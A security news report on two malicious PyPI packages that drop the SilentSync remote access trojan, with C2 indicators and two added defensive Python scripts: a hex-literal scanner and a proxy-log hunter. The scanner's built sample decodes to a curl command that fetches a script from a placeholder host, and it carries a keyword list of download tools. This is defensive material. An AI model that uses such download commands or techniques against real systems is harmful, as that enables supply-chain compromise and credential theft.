
SilentSync RAT Delivered via Two Malicious PyPI Packages Targeting Python Developers

The Hacker News by The Hacker News
September 18, 2025


Sep 18, 2025Ravie LakshmananMalware / Supply Chain Attack

Cybersecurity researchers have discovered two new malicious packages in the Python Package Index (PyPI) repository that are designed to deliver a remote access trojan called SilentSync on Windows systems.

“SilentSync is capable of remote command execution, file exfiltration, and screen capturing,” Zscaler ThreatLabz’s Manisha Ramcharan Prajapati and Satyam Singh said. “SilentSync also extracts web browser data, including credentials, history, autofill data, and cookies from web browsers like Chrome, Brave, Edge, and Firefox.”

The packages, now no longer available for download from PyPI, are listed below. They were both uploaded by a user named “CondeTGAPIS.”

  • sisaws (201 Downloads)
  • secmeasure (627 Downloads)

Zscaler said the package sisaws mimics the behavior of the legitimate Python package sisa, which is associated with Argentina’s national health information system, Sistema Integrado de Información Sanitaria Argentino (SISA).

However, the library's initialization script (__init__.py) contains a function called “gen_token()” that acts as a downloader for next-stage malware. To do so, it sends a hard-coded token as input and receives a secondary static token in response, in a manner similar to the legitimate SISA API.

“If a developer imports the sisaws package and invokes the gen_token function, the code will decode a hexadecimal string that reveals a curl command, which is then used to fetch an additional Python script,” Zscaler said. “The Python script retrieved from PasteBin is written to the filename helper.py in a temporary directory and executed.”
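A static check for the pattern Zscaler describes, a hex string literal that decodes to a download command, can be run over a package's source before it is installed or imported. The scanner below is an added example, not code from Zscaler or from the packages; the function name, thresholds, token list and the sample `__init__.py` (with a placeholder URL) are constructed for illustration.

```python
import ast
import binascii
import re

# Hex literals shorter than this are usually colours, IDs or hash fragments.
MIN_HEX_CHARS = 24
HEX_RE = re.compile(r"\A(?:[0-9a-fA-F]{2})+\Z")
# Tokens that suggest a decoded string is a download-and-run command (assumed list).
SUSPICIOUS = ("curl ", "wget ", "powershell", "http://", "https://")


def find_hex_encoded_commands(source, filename="<package>"):
    """Return (line, decoded_text, matched_tokens) for each suspicious hex literal."""
    findings = []
    for node in ast.walk(ast.parse(source, filename=filename)):
        if not (isinstance(node, ast.Constant) and isinstance(node.value, str)):
            continue
        literal = node.value.strip()
        if len(literal) < MIN_HEX_CHARS or not HEX_RE.match(literal):
            continue
        try:
            decoded = binascii.unhexlify(literal).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # binary data such as a real digest, not a text command
        hits = [t.strip() for t in SUSPICIOUS if t in decoded.lower()]
        if hits:
            findings.append((node.lineno, decoded, hits))
    return findings


# Constructed sample: same shape as the article describes, placeholder URL only.
_CMD = "curl -s -o helper.py https://example.invalid/raw/PLACEHOLDER"
SAMPLE_INIT = (
    "import os\n"
    "DIGEST = 'd41d8cd98f00b204e9800998ecf8427e'\n"
    "def gen_token(token):\n"
    f"    cmd = bytes.fromhex('{_CMD.encode().hex()}').decode()\n"
    "    return cmd\n"
)

if __name__ == "__main__":
    for line, text, hits in find_hex_encoded_commands(SAMPLE_INIT, "__init__.py"):
        print(f"__init__.py:{line}: hex literal decodes to {text!r} (matched {hits})")
```

Because the source is parsed with `ast` and never imported, the package's code does not run during the scan.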

Secmeasure, in a similar fashion, masquerades as a “library for cleaning strings and applying security measures,” but harbors embedded functionality to drop SilentSync RAT.

SilentSync is mainly geared towards infecting Windows systems at this stage, but the malware also has built-in features for Linux and macOS. It makes Registry modifications on Windows, alters the crontab file on Linux to execute the payload on system startup, and registers a LaunchAgent on macOS.

The package relies on the secondary token’s presence to send an HTTP GET request to a hard-coded endpoint (“200.58.107[.]25”) in order to receive Python code that’s directly executed in memory. The server supports four different endpoints –

  • /checkin, to verify connectivity
  • /comando, to request commands to execute
  • /respuesta, to send a status message
  • /archivo, to send command output or stolen data
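The endpoint names above give defenders something to hunt for in web proxy logs. The following is an added example, not part of the original report: the log layout, the `hunt` function, the two-path heuristic for unknown hosts and the sample traffic are all assumptions constructed for illustration; only the IP address and the four paths come from the article.

```python
import re
from collections import defaultdict

# IoC as printed in the article (defanged), refanged for matching.
C2_HOST = "200.58.107[.]25".replace("[.]", ".")
C2_PATHS = {"/checkin", "/comando", "/respuesta", "/archivo"}

# Assumed proxy log layout: "<time> <client> <METHOD> <url> <status>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) "
    r"https?://(?P<host>[^/:\s]+)(?::\d+)?(?P<path>/[^\s?]*)?\S* (?P<status>\d{3})$"
)


def hunt(lines):
    """Return {(client, host): sorted C2-style paths} for suspicious pairs."""
    seen = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines that do not fit the assumed layout
        path = (m["path"] or "/").rstrip("/") or "/"
        if path in C2_PATHS:
            seen[(m["client"], m["host"])].add(path)
    # Known IoC host: one hit is enough. Any other host: require two or more
    # distinct paths, since a lone /checkin is common in legitimate apps.
    return {
        key: sorted(paths)
        for key, paths in seen.items()
        if key[1] == C2_HOST or len(paths) >= 2
    }


# Constructed sample traffic; hosts other than the IoC are documentation addresses.
SAMPLE_LOG = [
    f"2025-09-18T10:00:01Z 10.0.0.5 GET http://{C2_HOST}/checkin 200",
    f"2025-09-18T10:00:31Z 10.0.0.5 GET http://{C2_HOST}/comando 200",
    f"2025-09-18T10:01:02Z 10.0.0.5 POST http://{C2_HOST}/archivo 200",
    "2025-09-18T10:02:00Z 10.0.0.9 GET https://hotel.example.com/checkin?lang=en 200",
    "2025-09-18T10:03:00Z 10.0.0.7 GET http://198.51.100.20/comando 200",
    "2025-09-18T10:03:30Z 10.0.0.7 POST http://198.51.100.20/respuesta 200",
]

if __name__ == "__main__":
    for (client, host), paths in hunt(SAMPLE_LOG).items():
        print(f"{client} -> {host}: {', '.join(paths)}")
```

The second rule catches the same path set on a different server, which matters if the operator moves infrastructure while keeping the endpoint names.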

The malware is capable of harvesting browser data, executing shell commands, capturing screenshots, and stealing files. It can also exfiltrate files and entire directories in the form of ZIP archives. Once the data is transmitted, all the artifacts are deleted from the host to sidestep detection efforts.

“The discovery of the malicious PyPI packages sisaws and secmeasure highlight the growing risk of supply chain attacks within public software repositories,” Zscaler said. “By leveraging typosquatting and impersonating legitimate packages, threat actors can gain access to personally identifiable information (PII).”


